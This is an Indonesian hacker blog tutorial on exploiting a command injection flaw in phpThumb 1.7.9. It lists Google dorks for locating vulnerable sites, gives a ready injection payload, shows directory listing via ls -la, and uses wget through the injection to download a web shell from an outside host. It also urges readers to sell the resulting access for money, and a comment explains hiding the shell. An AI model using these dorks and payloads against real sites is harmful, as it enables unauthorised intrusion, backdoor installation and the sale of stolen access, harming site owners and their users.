Breaking

Rabu, 16 Oktober 2019

phpThumb command injection

Halo adek adek ku semua nya, balik lagi sama w admin tergans disini muehehe. Hari ini w share tutorial phpThumb command injection ea ges xixixi ora rce ora oce bosQ👊😎.

Command Injection adalah kerentanan format string yang terjadi ketika input pengguna yang tidak difilter kemudian diteruskan ke shell system() , exec() , dll). penyerang dapat mengeksploitasi kerentanan ini dengan urutan perintah yang ditambahkan ke format yang sesuai untuk mengeksekusi perintah shell.
HekedBay

Thanks buat abang ManToed karena dh kasih lip target hihihi
Dork:
inurl:/phpThumb.php?src=
inurl:/phpthumb index of
inurl:/phpthumb/cache ext:jpg
Affected version: 1.7.9
Ref: Heked Bay
Payload:
file.jpg&fltr[]=blur|9 -quality  75 -interlace line fail.jpg jpeg:fail.jpg ; Command Here ; &phpThumbDebug=9

Langsung aja dorking dlo gaes :vroot
Disini w dh ad lip target ea h3h3
Itu adalah target w, versi 1.7.9 keatas? Skip...
Langsung masukin payloadna
http://localhost/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality  75 -interlace line fail.jpg jpeg:fail.jpg ; ls -la ; &phpThumbDebug=9
Gaperlu w jelasin kali ya ls -la itu muehehe kan dh sering w bagi tau :'(
Dor muncul dir listing na :""""V langsung aj kita pasang shell/uploader, cem biasa disini w pasang uploader dulu dari http://flickr.com.tvcw.org/shell.php
http://localhost/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality  75 -interlace line fail.jpg jpeg:fail.jpg ; wget http://flickr.com.tvcw.org/shell.php ; &phpThumbDebug=9
Klu udh tinggal akses aj ges xixixi
Dah gitu? Jual akses na mld mirror mending sell aj biar $$$$ ngalir tross ngohaha xD


4 komentar:

  1. Balasan
    1. Ganti aj phpthumb.php jadi nama shell mu contoh (site.com/phpthumb/phpthumb.php ganti jadi site.com/phpthumb/namashell.php)

      Hapus
  2. Kalau kurang jelas bisa liat di channel hekedbay ya mzz
    https://youtu.be/hpVtHlEmAEM

    BalasHapus